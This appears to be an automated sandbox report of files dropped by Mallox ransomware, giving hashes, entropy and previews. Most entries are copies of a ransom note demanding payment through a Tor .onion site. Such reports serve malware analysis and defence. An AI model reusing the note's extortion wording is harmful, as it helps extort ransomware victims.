                    C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos\31169036496.ttf

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):240244
                    Entropy (8bit):7.999224921312251
                    Encrypted:true
                    SSDEEP:6144:gUjVaknVMY0Q3uNl9J+lHobppnUqhoAhP39L/jZEvMhPT6:gURtOQ+XfYHanUqhoaZ/evMhT6
                    MD5:C1E65F9CD6779861E06927C452F2BA82
                    SHA1:D795E6C1B1BDE97C1493B4CD15F918732462D08C
                    SHA-256:B28F4C9852F1BD33C8E9D658A34119A0B6F1408F1F504EFE85CC862890B604D7
                    SHA-512:906ADFB262BC4470EE74EDFBEDA7D7C3036ECA8EF532CB5DE9E81C4A63581FBCC297EB57D5446D68A1306B9F9038A296C84F0589A3CA54C8974AF8FD4441EACB
                    Malicious:true
                    Preview:^....5^.?..i.=.. _..{X!.H.d...$..d.r.i....&.X...N!...K..S..0...#=ck..6'do.......9.k#qIDJ.J...0.l..HL...1.Wr.p...X .$..G....sxZ..n........zSZ$....TY...d.q]...@U.H. ...l%d.j8z..O...D..).&.l....`O......[T..ek..X..=.`8..%/.^.).|..g.X_!.Mz.........m.&).I.S.1FI..A.3..C.-p.7l..B...~..}l.ah..R`.Q..D...l^.e...#...q...f...$.j.p....c}W.k`.t.....z"..ZVP..y..g0;].,.2I.p.\.........u..f.O......=..*...`f.8..*.Y.@JCh..%.`..RJ...u.L.%......>F(..I~..<.W{).p.jw..UGO...;.Wy?t...........R5\...0..PN6._.....J.E!\..Y[.:%?.).<cCOE....]i.f.i.I.....-.........'pX6r..^hz.7._.;.|....nU..lVb...#.-].M..B.....9.b.1.:.K....J..y..:C.q.G....6.....-.*..>bvE"R.+...F>...%.(..P...5...\y...?.Q*..y..[..'c<k...Y.*....A...L=^..z.!.g0.T.$....@`..7..._...I}........Du.J.r....d8.b.......u..,...!|...ZI3.....E...0...{....S.x..'...nI~.H..7.ZZ.<......E[.1.'Cp|.(..2"....(...u....v.u4&~).._&u...3y....m..w$.&......a.<.{.7..).m....ZP=&.....e.&..t.pAr..v.l.x^.].Pt.t...G?.<s-.Y.=..;8J-)..Y.._...7>.4..8U

                    C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\FontCache\4\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\FontCache\4\PreviewFont\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\FontCache\4\PreviewFont\flat_officeFontsPreview_4_35.ttf

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):758940
                    Entropy (8bit):7.999720667207387
                    Encrypted:true
                    SSDEEP:12288:1mGCyMwcPyp1rbnCgzl/ZIVPdnUHdMBGl5FN+TiJ3kV9O8H0ij7J+VcoXAfUDr8K:1mGkwCyvigVmdegE5PNiJToXAir8D+
                    MD5:E44EFCB9499DC0BA6BADF7283EC6EC28
                    SHA1:42ABD0C21CECBD0A19D2276096213EF108D2C2A6
                    SHA-256:D287DE09902398F3E84AAA6FDE1EC2670FEEA24D4DF7C23628710CDCC132B0F7
                    SHA-512:64BC99677158D6303E5990A26EFBE8A0A5AFBA1F483EE86FCAD278047AF481ABA8C008099E88856DBB1C3BB4B48221F9D7E9553FE880821CAFCDCCAB74A5216A
                    Malicious:true
                    Preview:.aB..R#..c.(...e....c...n~.&..~.....k/.$'.3K...=.g.....v{..t.........S...\...y..&t1....&.(P....O......w <.../s.lAy.?......J.S.......j.w..o. D`.I..0.Y..|0...&,.9..;.7]b.@.I..Y.[.:..w..]8..Z...TZ.I...I.k...=...t..J....G.....i...-.0ZV.....Y.......W.r....Y.?##....]..5.o.v....1..L..3 .4..^9=..P>.z..8._R.P..y.z.3..C.eQZ..x...)......N.o.r}.L...6...[....w...@n..........Xz_k\.S..1.*..q..n..s..U.v.".Gt..~6.......F.:....u*p.}.V....g.....y...2e...y.`.p.9.r...h.X...7J:_..b.8R...."..'.N_v...!...T..u......X.]r...^...,_...W.+....{mW*\.b..k..1_..{...d..G|0.`.q..:.>........_~....W_/..'..1...}.j>....dr.9.....S.5;.. 5_ir..,.......D.R]n..K..&/O.px.j..Z...n<..5.U...y....Ew.n.....1.cf..v'.....14...,2...M3g|..b9!...E...Ql.f}D...:..J.l+..e8.?....:.V..;Q*..C..,q.X.s..O.2..c.+h......3.V_...K...+.JS.K..a.h.. ?~[0.i...e^+.%..|.l..d.!..n_U..j.eH.eMJh...'.."..._.._2....Z..W..buD..l.&.H$.|..sw0c.[9..m.B......f.R..e"T....T..n....9d..6....\..).*....

                    C:\Users\user\AppData\Local\Microsoft\FontCache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\GameDVR\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\InputPersonalization\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\InputPersonalization\TrainedDataStore\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Media Player\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\000CD46C\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Media Player\Transcoded Files Cache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-CH{343067CF-C5D4-4B05-92F9-D697BDB4D02D}\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-CH{343067CF-C5D4-4B05-92F9-D697BDB4D02D}\{19EE3739-B3CF-4F62-8AF3-D3139DDA7F2E}mt11829122.png

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):14231
                    Entropy (8bit):7.987792445715001
                    Encrypted:false
                    SSDEEP:384:FC42/hzmD7+G4dmZFtjh5TMwZGazH6Yf/kAZRH753Hh+:FC4MRm3+lQfjTTcazH6Yf/b3b9h+
                    MD5:15ACFFCCDEC628D23B4A1656C8BDB977
                    SHA1:0F1CE69D088ACA26F5E941310AC8BDF6203FBDE4
                    SHA-256:1E44CD56092B82A77892DD80B3AFBA37DE14E028C16F2403E6AF465ADE02008A
                    SHA-512:06CBE4E3679E0E14BE981D3DB3FE94EE1896B1D6B4A8842859C742C2143443A26F9849A9F175E104513DD56C2E460F7C3D4780FC0189F3918EE7FF0416B6522F
                    Malicious:false
